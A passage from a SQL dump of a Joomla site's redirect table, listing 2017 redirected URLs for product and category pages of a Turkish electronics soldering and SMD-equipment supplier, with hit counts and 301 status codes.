00:00:00',301),(8965,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/mx200lp-3-detail',NULL,'','',282,0,'2017-11-05 23:25:44','0000-00-00 00:00:00',301),(8966,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',285,0,'2017-11-05 23:25:46','0000-00-00 00:00:00',301),(8967,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme',NULL,'','',563,0,'2017-11-05 23:25:53','0000-00-00 00:00:00',301),(8968,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,product_name',NULL,'','',550,0,'2017-11-05 23:25:56','0000-00-00 00:00:00',301),(8969,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',561,0,'2017-11-05 23:26:09','0000-00-00 00:00:00',301),(8970,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',541,0,'2017-11-05 23:26:12','0000-00-00 00:00:00',301),(8971,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',544,0,'2017-11-05 23:26:16','0000-00-00 00:00:00',301),(8972,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',553,0,'2017-11-05 23:26:19','0000-00-00 00:00:00',301),(8973,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',546,0,'2017-11-05 23:26:23','0000-00-00 00:00:00',301),(8974,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',546,0,'2017-11-05 23:26:25','0000-00-00 00:00:00',301),(8975,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',538,0,'2017-11-05 23:26:28','0000-00-00 00:00:00',301),(8976,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,product_name',NULL,'','',550,0,'2017-11-05 23:26:40','0000-00-00 00:00:00',301),(8977,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',547,0,'2017-11-05 23:26:42','0000-00-00 00:00:00',301),(8978,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',548,0,'2017-11-05 23:26:44','0000-00-00 00:00:00',301),(8979,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/by,`p`.product_sku',NULL,'','',551,0,'2017-11-05 23:26:47','0000-00-00 00:00:00',301),(8980,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/by,product_name/dirdesc',NULL,'','',535,0,'2017-11-05 23:26:59','0000-00-00 00:00:00',301),(8981,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:27:01','0000-00-00 00:00:00',301),(8982,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',513,0,'2017-11-05 23:27:03','0000-00-00 00:00:00',301),(8983,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:27:05','0000-00-00 00:00:00',301),(8984,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:27:08','0000-00-00 00:00:00',301),(8985,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',512,0,'2017-11-05 23:27:19','0000-00-00 00:00:00',301),(8986,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',512,0,'2017-11-05 23:27:22','0000-00-00 00:00:00',301),(8987,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',516,0,'2017-11-05 23:27:40','0000-00-00 00:00:00',301),(8988,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',518,0,'2017-11-05 23:27:43','0000-00-00 00:00:00',301),(8989,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',506,0,'2017-11-05 23:28:00','0000-00-00 00:00:00',301),(8990,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:28:06','0000-00-00 00:00:00',301),(8991,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:28:09','0000-00-00 00:00:00',301),(8992,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',516,0,'2017-11-05 23:28:11','0000-00-00 00:00:00',301),(8993,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',504,0,'2017-11-05 23:28:28','0000-00-00 00:00:00',301),(8994,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:28:33','0000-00-00 00:00:00',301),(8995,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın',NULL,'','',512,0,'2017-11-05 23:28:38','0000-00-00 00:00:00',301),(8996,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',514,0,'2017-11-05 23:28:41','0000-00-00 00:00:00',301),(8997,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',509,0,'2017-11-05 23:28:48','0000-00-00 00:00:00',301),(8998,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',508,0,'2017-11-05 23:29:03','0000-00-00 00:00:00',301),(8999,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',511,0,'2017-11-05 23:29:05','0000-00-00 00:00:00',301),(9000,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',512,0,'2017-11-05 23:29:19','0000-00-00 00:00:00',301),(9001,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',513,0,'2017-11-05 23:29:22','0000-00-00 00:00:00',301),(9002,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,ordering?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:29:31','0000-00-00 00:00:00',301),(9003,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/ls60v-detail',NULL,'','',260,0,'2017-11-05 23:29:33','0000-00-00 00:00:00',301),(9004,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:29:35','0000-00-00 00:00:00',301),(9005,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,category_name',NULL,'','',502,0,'2017-11-05 23:29:39','0000-00-00 00:00:00',301),(9006,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,category_name/dirdesc',NULL,'','',503,0,'2017-11-05 23:29:42','0000-00-00 00:00:00',301),(9007,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,mf_name?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:29:47','0000-00-00 00:00:00',301),(9008,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:30:07','0000-00-00 00:00:00',301),(9009,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/by,product_sku',NULL,'','',503,0,'2017-11-05 23:30:10','0000-00-00 00:00:00',301),(9010,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/dirdesc',NULL,'','',503,0,'2017-11-05 23:30:20','0000-00-00 00:00:00',301),(9011,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/gf-12-hc-ht-detail',NULL,'','',252,0,'2017-11-05 23:30:29','0000-00-00 00:00:00',301),(9012,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',254,0,'2017-11-05 23:30:33','0000-00-00 00:00:00',301),(9013,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/ly-8c-detail',NULL,'','',256,0,'2017-11-05 23:30:35','0000-00-00 00:00:00',301),(9014,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',254,0,'2017-11-05 23:30:45','0000-00-00 00:00:00',301),(9015,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:30:47','0000-00-00 00:00:00',301),(9016,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı',NULL,'','',503,0,'2017-11-05 23:30:49','0000-00-00 00:00:00',301),(9017,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/am100-detail',NULL,'','',246,0,'2017-11-05 23:30:52','0000-00-00 00:00:00',301),(9018,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',250,0,'2017-11-05 23:30:56','0000-00-00 00:00:00',301),(9019,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',502,0,'2017-11-05 23:30:59','0000-00-00 00:00:00',301),(9020,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',507,0,'2017-11-05 23:31:05','0000-00-00 00:00:00',301),(9021,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name',NULL,'','',510,0,'2017-11-05 23:31:36','0000-00-00 00:00:00',301),(9022,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme',NULL,'','',567,0,'2017-11-05 23:31:39','0000-00-00 00:00:00',301),(9023,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',509,0,'2017-11-05 23:31:40','0000-00-00 00:00:00',301),(9024,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',557,0,'2017-11-05 23:31:42','0000-00-00 00:00:00',301),(9025,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name',NULL,'','',516,0,'2017-11-05 23:31:42','0000-00-00 00:00:00',301),(9026,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',562,0,'2017-11-05 23:31:44','0000-00-00 00:00:00',301),(9027,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,category_name',NULL,'','',560,0,'2017-11-05 23:31:57','0000-00-00 00:00:00',301),(9028,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',512,0,'2017-11-05 23:31:59','0000-00-00 00:00:00',301),(9029,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',556,0,'2017-11-05 23:32:00','0000-00-00 00:00:00',301),(9030,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,category_name?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:32:03','0000-00-00 00:00:00',301),(9031,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,mf_name',NULL,'','',557,0,'2017-11-05 23:32:05','0000-00-00 00:00:00',301),(9032,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name',NULL,'','',509,0,'2017-11-05 23:32:06','0000-00-00 00:00:00',301),(9033,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-05 23:32:07','0000-00-00 00:00:00',301),(9034,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',511,0,'2017-11-05 23:32:08','0000-00-00 00:00:00',301),(9035,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,ordering?language=en-gb',NULL,'','',1,0,'2017-11-05 23:32:12','0000-00-00 00:00:00',301),(9036,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2017-11-05 23:32:15','0000-00-00 00:00:00',301),(9037,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,ordering',NULL,'','',513,0,'2017-11-05 23:32:17','0000-00-00 00:00:00',301),(9038,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,product_name',NULL,'','',557,0,'2017-11-05 23:32:20','0000-00-00 00:00:00',301),(9039,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,product_name',NULL,'','',509,0,'2017-11-05 23:32:22','0000-00-00 00:00:00',301),(9040,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/dirdesc',NULL,'','',554,0,'2017-11-05 23:32:24','0000-00-00 00:00:00',301),(9041,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',511,0,'2017-11-05 23:32:24','0000-00-00 00:00:00',301),(9042,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:32:33','0000-00-00 00:00:00',301),(9043,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',254,0,'2017-11-05 23:32:38','0000-00-00 00:00:00',301),(9044,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim',NULL,'','',512,0,'2017-11-05 23:32:40','0000-00-00 00:00:00',301),(9045,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',505,0,'2017-11-05 23:32:42','0000-00-00 00:00:00',301),(9046,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-05 23:32:47','0000-00-00 00:00:00',301),(9047,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/by,category_name',NULL,'','',513,0,'2017-11-05 23:32:56','0000-00-00 00:00:00',301),(9048,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/by,category_name/dirdesc',NULL,'','',517,0,'2017-11-05 23:33:00','0000-00-00 00:00:00',301),(9049,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/by,ordering',NULL,'','',509,0,'2017-11-05 23:33:12','0000-00-00 00:00:00',301),(9050,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/by,product_name',NULL,'','',510,0,'2017-11-05 23:33:16','0000-00-00 00:00:00',301),(9051,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/by,product_name/dirdesc',NULL,'','',512,0,'2017-11-05 23:33:18','0000-00-00 00:00:00',301),(9052,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/by,product_sku',NULL,'','',511,0,'2017-11-05 23:33:39','0000-00-00 00:00:00',301),(9053,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/dirdesc',NULL,'','',518,0,'2017-11-05 23:33:44','0000-00-00 00:00:00',301),(9054,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/e-bar-26-detail',NULL,'','',259,0,'2017-11-05 23:33:49','0000-00-00 00:00:00',301),(9055,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme',NULL,'','',265,0,'2017-11-05 23:33:54','0000-00-00 00:00:00',301),(9056,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',257,0,'2017-11-05 23:33:56','0000-00-00 00:00:00',301),(9057,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı',NULL,'','',259,0,'2017-11-05 23:33:59','0000-00-00 00:00:00',301),(9058,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın',NULL,'','',263,0,'2017-11-05 23:34:02','0000-00-00 00:00:00',301),(9059,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı',NULL,'','',258,0,'2017-11-05 23:34:05','0000-00-00 00:00:00',301),(9060,'http://www.3s-technologies.com.tr/index.php/en/products/mx200lp-detail?tmpl=component&print=1',NULL,'','',27,0,'2017-11-05 23:34:22','0000-00-00 00:00:00',301),(9061,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_sku?error=404&language=en-gb',NULL,'','',1,0,'2017-11-05 23:36:07','0000-00-00 00:00:00',301),(9062,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-detail/askquestion?tmpl=component',NULL,'','',23,0,'2017-11-05 23:42:37','0000-00-00 00:00:00',301),(9063,'http://3s-technologies.com.tr/tr/ueruenler/smd-düşük-hızlı',NULL,'','',9,0,'2017-11-05 23:44:27','0000-00-00 00:00:00',301),(9064,'http://3s-technologies.com.tr/index.php/en/products/275-k100-1.2mm-detail?tmpl=component&print=1',NULL,'','',10,0,'2017-11-05 23:46:37','0000-00-00 00:00:00',301),(9065,'http://www.3s-technologies.com.tr/tr/ueruenler/thru-hole',NULL,'','',27,0,'2017-11-05 23:48:07','0000-00-00 00:00:00',301),(9066,'http://3s-technologies.com.tr/tr/images/pdf/le_benchtop_automated_pick-place.pdf',NULL,'','',31,0,'2017-11-06 00:13:12','0000-00-00 00:00:00',301),(9067,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',26,0,'2017-11-06 00:13:26','0000-00-00 00:00:00',301),(9068,'http://3s-technologies.com.tr/index.php/en/products/npm-detail?print=1&tmpl=component',NULL,'','',2,0,'2017-11-06 00:17:56','0000-00-00 00:00:00',301),(9069,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-06 00:21:14','0000-00-00 00:00:00',301),(9070,'http://3s-technologies.com.tr/tr/urunler/rh2-detail?tmpl=component&print=1',NULL,'','',13,0,'2017-11-06 00:24:34','0000-00-00 00:00:00',301),(9071,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,product_name/dirdesc?language=tr-tr',NULL,'','',8,0,'2017-11-06 00:24:40','0000-00-00 00:00:00',301),(9072,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',239,0,'2017-11-06 00:27:56','0000-00-00 00:00:00',301),(9073,'http://3s-technologies.com.tr/index.php/en/products/manufacturers/ddm-novastar?tmpl=component',NULL,'','',2,0,'2017-11-06 00:28:35','0000-00-00 00:00:00',301),(9074,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,product_name',NULL,'','',704,0,'2017-11-06 00:29:08','0000-00-00 00:00:00',301),(9075,'https://www.3s-technologies.com.tr/tr/robots.txt',NULL,'','',24083,0,'2017-11-06 00:30:46','0000-00-00 00:00:00',301),(9076,'https://www.3s-technologies.com.tr/tr/.well-known/assetlinks.json',NULL,'','',488,0,'2017-11-06 00:30:47','0000-00-00 00:00:00',301),(9077,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',18,0,'2017-11-06 00:31:23','0000-00-00 00:00:00',301),(9078,'http://3s-technologies.com.tr/index.php/tr/ueruenler/asp-300-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-06 00:31:29','0000-00-00 00:00:00',301),(9079,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar',NULL,'','',14,0,'2017-11-06 00:37:41','0000-00-00 00:00:00',301),(9080,'http://3s-technologies.com.tr/tr/ueruenler/manufacturers/panasonic',NULL,'','',9,0,'2017-11-06 00:39:45','0000-00-00 00:00:00',301),(9081,'http://www.3s-technologies.com.tr/tr/ueruenler/lehimleme-malzemeleri/tel-lehim',NULL,'','',27,0,'2017-11-06 00:49:53','0000-00-00 00:00:00',301),(9082,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/gf-12-hc-ht-detail',NULL,'','',176,0,'2017-11-06 00:50:05','0000-00-00 00:00:00',301),(9083,'http://3s-technologies.com.tr/en/products/manufacturer/dalga-lehim',NULL,'','',16,0,'2017-11-06 00:54:03','0000-00-00 00:00:00',301),(9084,'http://www.3s-technologies.com.tr/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',25,0,'2017-11-06 00:55:03','0000-00-00 00:00:00',301),(9085,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering?language=en-gb',NULL,'','',25,0,'2017-11-06 01:00:47','0000-00-00 00:00:00',301),(9086,'http://www.3s-technologies.com.tr/en/products/thru-hole/av132-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-06 01:01:48','0000-00-00 00:00:00',301),(9087,'http://3s-technologies.com.tr/index.php/en/products/rl132-detail?tmpl=component&print=1',NULL,'','',10,0,'2017-11-06 01:23:38','0000-00-00 00:00:00',301),(9088,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_sku?language=tr-tr',NULL,'','',2,0,'2017-11-06 01:33:51','0000-00-00 00:00:00',301),(9089,'http://www.3s-technologies.com.tr/tr/ueruenler',NULL,'','',26,0,'2017-11-06 01:35:48','0000-00-00 00:00:00',301),(9090,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-06 01:40:57','0000-00-00 00:00:00',301),(9091,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,mf_name?error=404&language=en-gb',NULL,'','',1,0,'2017-11-06 01:42:00','0000-00-00 00:00:00',301),(9092,'http://www.3s-technologies.com.tr/tr/ueruenler/bölgesel-lehimleme',NULL,'','',26,0,'2017-11-06 01:44:31','0000-00-00 00:00:00',301),(9093,'http://www.3s-technologies.com.tr/tr/ueruenler/manufacturers/panasonic',NULL,'','',28,0,'2017-11-06 01:50:57','0000-00-00 00:00:00',301),(9094,'http://www.3s-technologies.com.tr/tr/ueruenler/dalga-lehim',NULL,'','',30,0,'2017-11-06 01:51:01','0000-00-00 00:00:00',301),(9095,'http://www.3s-technologies.com.tr/index.php/en/products/flux/955lc-37-detail',NULL,'','',26,0,'2017-11-06 01:52:02','0000-00-00 00:00:00',301),(9096,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,product_name/dirdesc?language=tr-tr',NULL,'','',8,0,'2017-11-06 01:54:09','0000-00-00 00:00:00',301),(9097,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız',NULL,'','',256,0,'2017-11-06 01:55:07','0000-00-00 00:00:00',301),(9098,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-06 01:55:18','0000-00-00 00:00:00',301),(9099,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',56,0,'2017-11-06 02:01:26','0000-00-00 00:00:00',301),(9100,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',5,0,'2017-11-06 02:01:53','0000-00-00 00:00:00',301),(9101,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',10,0,'2017-11-06 02:05:18','0000-00-00 00:00:00',301),(9102,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,product_sku?language=en-gb',NULL,'','',19,0,'2017-11-06 02:12:15','0000-00-00 00:00:00',301),(9103,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku/results,1-100',NULL,'','',1,0,'2017-11-06 02:12:26','0000-00-00 00:00:00',301),(9104,'http://www.3s-technologies.com.tr/tr/ueruenler/smd-orta-hızlı',NULL,'','',32,0,'2017-11-06 02:12:26','0000-00-00 00:00:00',301),(9105,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/sp-18p-l-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-06 02:13:20','0000-00-00 00:00:00',301),(9106,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/atomic/home-page-atomic/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',25,0,'2017-11-06 02:20:08','0000-00-00 00:00:00',301),(9107,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,mf_name',NULL,'','',19,0,'2017-11-06 02:22:17','0000-00-00 00:00:00',301),(9108,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/am100-detail',NULL,'','',382,0,'2017-11-06 02:22:32','0000-00-00 00:00:00',301),(9109,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,product_sku',NULL,'','',402,0,'2017-11-06 02:23:38','0000-00-00 00:00:00',301),(9110,'http://3s-technologies.com.tr/en/products?categorylayout=0',NULL,'','',1,0,'2017-11-06 02:24:39','0000-00-00 00:00:00',301),(9111,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by?language=en-gb&product_sku',NULL,'','',7,0,'2017-11-06 02:30:32','0000-00-00 00:00:00',301),(9112,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim',NULL,'','',18,0,'2017-11-06 02:32:15','0000-00-00 00:00:00',301),(9113,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/rl132-detail',NULL,'','',47,0,'2017-11-06 02:36:29','0000-00-00 